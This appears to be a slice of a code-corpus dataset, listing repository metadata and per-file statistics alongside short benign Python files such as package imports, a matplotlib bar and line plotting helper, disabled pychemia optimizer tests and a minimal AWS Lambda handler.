| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3e3a222baa801def196eaf026923f04923624ace
| 76
|
py
|
Python
|
drum/__init__.py
|
slmnv5/pepelats
|
044efa45be4c15289de9e300d681c2008af69962
|
[
"MIT"
] | 1
|
2022-01-06T02:51:25.000Z
|
2022-01-06T02:51:25.000Z
|
drum/__init__.py
|
slmnv5/pepelats
|
044efa45be4c15289de9e300d681c2008af69962
|
[
"MIT"
] | null | null | null |
drum/__init__.py
|
slmnv5/pepelats
|
044efa45be4c15289de9e300d681c2008af69962
|
[
"MIT"
] | 1
|
2021-12-01T20:52:21.000Z
|
2021-12-01T20:52:21.000Z
|
from drum._drumloader import DrumLoader
from drum._realdrum import RealDrum
| 25.333333
| 39
| 0.868421
| 10
| 76
| 6.4
| 0.5
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 40
| 38
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e42476a56418b10ddff3d2e11030d3d0367d24b6
| 182
|
py
|
Python
|
tests/test_classical/__init__.py
|
ajaysub110/JigglypuffRL
|
083fd26d05b7eac018e6db7d32c4be4587461766
|
[
"MIT"
] | null | null | null |
tests/test_classical/__init__.py
|
ajaysub110/JigglypuffRL
|
083fd26d05b7eac018e6db7d32c4be4587461766
|
[
"MIT"
] | null | null | null |
tests/test_classical/__init__.py
|
ajaysub110/JigglypuffRL
|
083fd26d05b7eac018e6db7d32c4be4587461766
|
[
"MIT"
] | null | null | null |
from tests.test_classical.test_agents import TestAgents
from tests.test_classical.test_bandits import TestBandit
from tests.test_classical.test_common import TestModels, TestTrainer
| 45.5
| 68
| 0.89011
| 25
| 182
| 6.24
| 0.48
| 0.173077
| 0.25
| 0.423077
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 182
| 3
| 69
| 60.666667
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
e43d297d7653330e8b775af4c9cf22d1216372e1
| 149
|
py
|
Python
|
tools/utils.py
|
BobuxBot/BobuxAdmin
|
81786bbccd6a440de9e1f8599cbb7a53d5a1d3b2
|
[
"MIT"
] | 2
|
2022-02-08T17:06:39.000Z
|
2022-02-19T01:55:12.000Z
|
tools/utils.py
|
BobuxBot/BobuxAdmin
|
81786bbccd6a440de9e1f8599cbb7a53d5a1d3b2
|
[
"MIT"
] | 2
|
2022-02-09T07:32:38.000Z
|
2022-02-13T07:36:43.000Z
|
tools/utils.py
|
BobuxBot/BobuxAdmin
|
81786bbccd6a440de9e1f8599cbb7a53d5a1d3b2
|
[
"MIT"
] | null | null | null |
from datetime import timedelta, datetime
def to_discord_timestamp(delta: timedelta):
return f"<t:{int((datetime.now() + delta).timestamp())}>"
| 24.833333
| 61
| 0.724832
| 19
| 149
| 5.578947
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120805
| 149
| 5
| 62
| 29.8
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0.315436
| 0.295302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
e458b8ab58a399bf110c1d57179939ad6057e7b1
| 2,381
|
py
|
Python
|
pychemia/searcher/tests/test_searcher_clusters.py
|
quanshengwu/PyChemia
|
98e9f7a1118b694dbda3ee75411ff8f8d7b9688b
|
[
"MIT"
] | 1
|
2021-03-26T12:34:45.000Z
|
2021-03-26T12:34:45.000Z
|
pychemia/searcher/tests/test_searcher_clusters.py
|
quanshengwu/PyChemia
|
98e9f7a1118b694dbda3ee75411ff8f8d7b9688b
|
[
"MIT"
] | null | null | null |
pychemia/searcher/tests/test_searcher_clusters.py
|
quanshengwu/PyChemia
|
98e9f7a1118b694dbda3ee75411ff8f8d7b9688b
|
[
"MIT"
] | null | null | null |
import unittest
class SearcherTest(unittest.TestCase):
def notest_harmony(self):
"""
Tests (pychemia.searcher.harmony) with LJ Clusters :
"""
import pychemia
pychemia.pcm_log.debug('HarmonySearch')
popu = pychemia.population.LJCluster('LJ', composition='Xe17')
searcher = pychemia.searcher.HarmonySearch(popu, generation_size=16, stabilization_limit=5)
searcher.run()
popu.pcdb.clean()
searcher = pychemia.searcher.HarmonySearch(popu, generation_size=16, stabilization_limit=5)
searcher.run()
def notest_swarm(self):
"""
Tests (pychemia.searcher.swarm) with LJ Clusters :
"""
import pychemia
pychemia.pcm_log.debug('ParticleSwarm')
popu = pychemia.population.LJCluster('LJ', composition='Xe17')
searcher = pychemia.searcher.ParticleSwarm(popu, generation_size=16, stabilization_limit=5)
searcher.run()
popu.pcdb.clean()
searcher = pychemia.searcher.ParticleSwarm(popu, generation_size=16, stabilization_limit=5)
searcher.run()
def notest_firefly(self):
"""
Tests (pychemia.searcher.firefly) with LJ Clusters :
"""
import pychemia
pychemia.pcm_log.debug('FireFly')
popu = pychemia.population.LJCluster('LJ', composition='Xe17')
searcher = pychemia.searcher.FireFly(popu, generation_size=16, stabilization_limit=5)
searcher.run()
popu.pcdb.clean()
searcher = pychemia.searcher.FireFly(popu,
{'delta': 0.1,'gamma': 0.1, 'beta0': 0.8, 'alpha0': 0, 'multi_move': True},
generation_size=16, stabilization_limit=5)
searcher.run()
def notest_genetic(self):
"""
Tests (pychemia.searcher.genetic) with LJ Clusters :
"""
import pychemia
pychemia.pcm_log.debug('GeneticAlgorithm')
popu = pychemia.population.LJCluster('LJ', composition='Xe17')
searcher = pychemia.searcher.GeneticAlgorithm(popu, generation_size=16, stabilization_limit=5)
searcher.run()
popu.pcdb.clean()
searcher = pychemia.searcher.GeneticAlgorithm(popu, generation_size=16, stabilization_limit=5)
searcher.run()
| 37.203125
| 120
| 0.618228
| 236
| 2,381
| 6.131356
| 0.20339
| 0.132688
| 0.132688
| 0.160332
| 0.794057
| 0.781617
| 0.781617
| 0.781617
| 0.781617
| 0.651693
| 0
| 0.023604
| 0.270475
| 2,381
| 63
| 121
| 37.793651
| 0.809442
| 0.105418
| 0
| 0.65
| 0
| 0
| 0.051081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e4e7047c6ab06c71f3fbc05897d44b3837769340
| 83
|
py
|
Python
|
test/run/t398.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/run/t398.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/run/t398.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
print zip([8, 9, 10], [11, 12, 13])
print zip([1, 2, 3])
print zip()
print zip([])
| 16.6
| 35
| 0.542169
| 17
| 83
| 2.647059
| 0.647059
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191176
| 0.180723
| 83
| 4
| 36
| 20.75
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
e4f70b504c346a484d8fe3a7d00e95d7176d3041
| 1,262
|
py
|
Python
|
src/statsplotter.py
|
gorcajo/spotify-dude
|
8c16960906bebf19673fec9c1477fc526259d024
|
[
"MIT"
] | null | null | null |
src/statsplotter.py
|
gorcajo/spotify-dude
|
8c16960906bebf19673fec9c1477fc526259d024
|
[
"MIT"
] | null | null | null |
src/statsplotter.py
|
gorcajo/spotify-dude
|
8c16960906bebf19673fec9c1477fc526259d024
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import uuid
from entities import Plottable
def plot_as_bar_graph(plottable):
x_axis = []
y_axis = []
for x_value in plottable.x_axis:
x_axis.append(x_value)
for y_value in plottable.y_axis:
y_axis.append(y_value)
y_pos = np.arange(len(x_axis))
plt.bar(y_pos, y_axis, align="center", alpha=0.5)
plt.xticks(y_pos, x_axis, rotation="vertical")
plt.title(plottable.title)
plt.ylabel(plottable.ylabel)
for i, j in zip(y_pos, y_axis):
plt.annotate(j, xy=(i, j), ha="center")
filename = "/tmp/" + str(uuid.uuid1()) + ".png"
plt.savefig(filename, format="png")
plt.clf()
return filename
def plot_as_line_graph(plottable):
x_axis = []
y_axis = []
for x_value in plottable.x_axis:
x_axis.append(x_value)
for y_value in plottable.y_axis:
y_axis.append(y_value)
y_pos = np.arange(len(x_axis))
plt.plot(y_pos, y_axis, alpha=0.5)
plt.xticks(y_pos, x_axis, rotation="vertical")
plt.title(plottable.title)
plt.ylabel(plottable.ylabel)
filename = "/tmp/" + str(uuid.uuid1()) + ".png"
plt.savefig(filename, format="png")
plt.clf()
return filename
| 22.140351
| 53
| 0.637876
| 196
| 1,262
| 3.903061
| 0.260204
| 0.065359
| 0.073203
| 0.035294
| 0.760784
| 0.760784
| 0.760784
| 0.760784
| 0.760784
| 0.760784
| 0
| 0.006167
| 0.229002
| 1,262
| 56
| 54
| 22.535714
| 0.780062
| 0
| 0
| 0.736842
| 0
| 0
| 0.041204
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
90003c628f469812da1eb37b4b855239dbff7f07
| 68
|
py
|
Python
|
superstructure/infrastructure/storage/__init.py
|
MultifokalHirn/superstructure
|
61672613da627d8c1bbd9250ca83df1d99bb1194
|
[
"MIT"
] | 3
|
2020-06-06T13:03:25.000Z
|
2021-03-19T08:32:23.000Z
|
superstructure/infrastructure/storage/__init.py
|
MultifokalHirn/superstructure
|
61672613da627d8c1bbd9250ca83df1d99bb1194
|
[
"MIT"
] | 309
|
2020-06-06T14:49:03.000Z
|
2022-03-31T00:02:09.000Z
|
superstructure/infrastructure/storage/__init.py
|
MultifokalHirn/superstructure
|
61672613da627d8c1bbd9250ca83df1d99bb1194
|
[
"MIT"
] | 1
|
2020-06-09T11:18:00.000Z
|
2020-06-09T11:18:00.000Z
|
from .pickled import * # noqa # nosec
from .redis import * # noqa
| 22.666667
| 38
| 0.661765
| 9
| 68
| 5
| 0.666667
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 68
| 2
| 39
| 34
| 0.865385
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
901f937a05619811b0e9fa38fd2c77e9c142714d
| 37
|
py
|
Python
|
scormxblock/__init__.py
|
fccn/edx_xblock_scorm
|
ff4f6a8a498b5c32273b0960c3ff9de80c0afe50
|
[
"Apache-2.0"
] | 36
|
2016-04-18T20:27:41.000Z
|
2022-01-13T13:20:50.000Z
|
scormxblock/__init__.py
|
fccn/edx_xblock_scorm
|
ff4f6a8a498b5c32273b0960c3ff9de80c0afe50
|
[
"Apache-2.0"
] | 25
|
2016-05-30T15:13:36.000Z
|
2022-02-21T07:57:15.000Z
|
scormxblock/__init__.py
|
fccn/edx_xblock_scorm
|
ff4f6a8a498b5c32273b0960c3ff9de80c0afe50
|
[
"Apache-2.0"
] | 51
|
2016-04-26T19:35:15.000Z
|
2021-11-08T23:00:10.000Z
|
from .scormxblock import ScormXBlock
| 18.5
| 36
| 0.864865
| 4
| 37
| 8
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5f7bf32403c4882d2106bf96ab7660945a2e7801
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/future/moves/socketserver.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/future/moves/socketserver.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/future/moves/socketserver.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/bf/c6/4b/bab0f11ce82cb9b626d6279f8e5a679c941cc7656e4541adf4508907d9
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 0
| 96
| 1
| 96
| 96
| 0.489583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5fa2ac09c4ec100ad2bb57428fd0fe0f556c3198
| 343
|
py
|
Python
|
python/anyascii/_data/_01c.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_01c.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_01c.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
b=" 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 a t g m l a k j m w i s h n r u c d n y e p d n r o t b n h m m ' , . v d o s t t ' e u A B G D E V Z T I K' L M N O P' Zh R S T' U P K Gh Q' Sh Ch Ts Dz Ts' Ch' Kh J H Ey Y W Q Ow F E ' G ' E \" W . * ; , L. K. D. B."
| 343
| 343
| 0.346939
| 108
| 343
| 1.101852
| 0.407407
| 0.033613
| 0.05042
| 0.067227
| 0.168067
| 0.168067
| 0.168067
| 0.168067
| 0.168067
| 0.168067
| 0
| 0.138889
| 0.580175
| 343
| 1
| 343
| 343
| 0.6875
| 0
| 0
| 0
| 0
| 1
| 0.918605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5faeb7fa13e72041e1ad1671dfa22265cd64cfd5
| 103
|
py
|
Python
|
libgcv/model/faster_rcnn/__init__.py
|
bhaveshbaranda/Human-Object-Relation-Network
|
8f358fa14fe14c7c02758359dce2a5c625be87c1
|
[
"MIT"
] | 2
|
2020-09-18T12:16:39.000Z
|
2021-07-08T01:41:33.000Z
|
libgcv/model/faster_rcnn/__init__.py
|
bhaveshbaranda/Human-Object-Relation-Network
|
8f358fa14fe14c7c02758359dce2a5c625be87c1
|
[
"MIT"
] | 2
|
2020-09-18T12:16:34.000Z
|
2021-07-15T05:33:26.000Z
|
libgcv/model/faster_rcnn/__init__.py
|
bhaveshbaranda/Human-Object-Relation-Network
|
8f358fa14fe14c7c02758359dce2a5c625be87c1
|
[
"MIT"
] | 6
|
2020-09-17T05:57:54.000Z
|
2021-07-15T05:34:01.000Z
|
"""Faster-RCNN Object Detection."""
from __future__ import absolute_import
from .faster_rcnn import *
| 20.6
| 38
| 0.786408
| 13
| 103
| 5.769231
| 0.615385
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116505
| 103
| 4
| 39
| 25.75
| 0.824176
| 0.281553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
081d10359a854427b08f208f142f6f43b5b2aee5
| 61
|
py
|
Python
|
src/lambda-python-example/handler.py
|
sbstjn/cdk-lambda-fleet
|
b2927c05786e78472648b1519bb5c82579b4e220
|
[
"MIT"
] | 17
|
2020-12-06T16:46:31.000Z
|
2021-06-16T18:00:21.000Z
|
src/lambda-python-example/handler.py
|
sbstjn/cdk-lambda-fleet
|
b2927c05786e78472648b1519bb5c82579b4e220
|
[
"MIT"
] | 3
|
2020-12-06T16:25:58.000Z
|
2021-03-04T21:28:18.000Z
|
src/lambda-python-example/handler.py
|
sbstjn/cdk-lambda-fleet
|
b2927c05786e78472648b1519bb5c82579b4e220
|
[
"MIT"
] | 3
|
2021-03-04T18:43:23.000Z
|
2021-06-16T18:00:23.000Z
|
import os
def run(event, context):
return 'Done: python'
| 15.25
| 25
| 0.688525
| 9
| 61
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196721
| 61
| 4
| 25
| 15.25
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0.193548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
082185772645afae6441c2b9c8987447a68645ef
| 46
|
py
|
Python
|
utils/__init__.py
|
ijmbarr/pythonic-metal
|
da4b8a496fae3c9211d7f52338568a8e354cd94d
|
[
"MIT"
] | 23
|
2017-08-25T02:40:16.000Z
|
2021-05-13T01:29:40.000Z
|
utils/__init__.py
|
ijmbarr/pythonic-metal
|
da4b8a496fae3c9211d7f52338568a8e354cd94d
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
ijmbarr/pythonic-metal
|
da4b8a496fae3c9211d7f52338568a8e354cd94d
|
[
"MIT"
] | 6
|
2017-10-20T20:31:49.000Z
|
2021-02-20T22:03:25.000Z
|
import utils.tokenizer
import utils.colouring
| 15.333333
| 22
| 0.869565
| 6
| 46
| 6.666667
| 0.666667
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 3
| 23
| 15.333333
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
083838fb72d28de7dda2ea4a493dec51dad7c45c
| 26
|
py
|
Python
|
models/__init__.py
|
ackness/GazeFlow
|
ca6b7d548571f85af84bdec77292758ab5d36449
|
[
"MIT"
] | 12
|
2020-12-29T12:00:20.000Z
|
2022-02-07T08:26:24.000Z
|
models/__init__.py
|
ackness/GazeFlow
|
ca6b7d548571f85af84bdec77292758ab5d36449
|
[
"MIT"
] | 1
|
2022-02-12T11:26:20.000Z
|
2022-02-12T11:26:28.000Z
|
models/__init__.py
|
ackness/GazeFlow
|
ca6b7d548571f85af84bdec77292758ab5d36449
|
[
"MIT"
] | 2
|
2021-08-20T14:40:01.000Z
|
2022-01-02T10:32:04.000Z
|
from .gazeflow import Glow
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f235d82edec1bb6596fdc81d0194a1638935d708
| 26
|
py
|
Python
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
|
26b4d37c6e280ff16858f37882752e9d15eac817
|
[
"BSD-3-Clause"
] | 129
|
2021-08-05T21:10:35.000Z
|
2022-03-08T06:38:50.000Z
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
|
26b4d37c6e280ff16858f37882752e9d15eac817
|
[
"BSD-3-Clause"
] | 2
|
2021-08-20T06:11:16.000Z
|
2021-09-08T03:25:09.000Z
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
|
26b4d37c6e280ff16858f37882752e9d15eac817
|
[
"BSD-3-Clause"
] | 16
|
2021-08-06T01:01:20.000Z
|
2022-02-02T14:19:17.000Z
|
from .covenantc2 import *
| 13
| 25
| 0.769231
| 3
| 26
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.153846
| 26
| 1
| 26
| 26
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f2bab902292b34d83bcfa28be9ab722470895fb1
| 150
|
py
|
Python
|
alexa_skills/helpers/__init__.py
|
johnyob/Alexa-Skills
|
3679a887bb519042511a16fbb848254dc0ee43a0
|
[
"MIT"
] | null | null | null |
alexa_skills/helpers/__init__.py
|
johnyob/Alexa-Skills
|
3679a887bb519042511a16fbb848254dc0ee43a0
|
[
"MIT"
] | null | null | null |
alexa_skills/helpers/__init__.py
|
johnyob/Alexa-Skills
|
3679a887bb519042511a16fbb848254dc0ee43a0
|
[
"MIT"
] | null | null | null |
from alexa_skills.helpers.Constants import NON_PRIMATIVES
from alexa_skills.helpers.Util import Struct, is_dialog_complete, is_request_type, is_intent
| 75
| 92
| 0.886667
| 23
| 150
| 5.434783
| 0.695652
| 0.144
| 0.24
| 0.352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 150
| 2
| 92
| 75
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
4b4224908ae525f2a12682e868b72a429fad4af4
| 42
|
py
|
Python
|
backend/src/session/src/google_oauth/__init__.py
|
parveenchahal/authonline.net
|
d9c25262705feb5820f63569e0dd3ab42c61199b
|
[
"Apache-2.0"
] | null | null | null |
backend/src/session/src/google_oauth/__init__.py
|
parveenchahal/authonline.net
|
d9c25262705feb5820f63569e0dd3ab42c61199b
|
[
"Apache-2.0"
] | 1
|
2022-02-27T12:27:57.000Z
|
2022-02-27T12:27:57.000Z
|
backend/src/session/src/google_oauth/__init__.py
|
parveenchahal/authonline.net
|
d9c25262705feb5820f63569e0dd3ab42c61199b
|
[
"Apache-2.0"
] | null | null | null |
from ._oauth_operations import GoogleOauth
| 42
| 42
| 0.904762
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4b810a505d7f76456f89ddc3761558a209896b7e
| 52
|
py
|
Python
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 126
|
2019-07-19T14:42:41.000Z
|
2022-03-21T22:22:19.000Z
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 38
|
2019-08-28T01:46:31.000Z
|
2022-03-17T05:46:51.000Z
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 55
|
2019-08-02T09:32:33.000Z
|
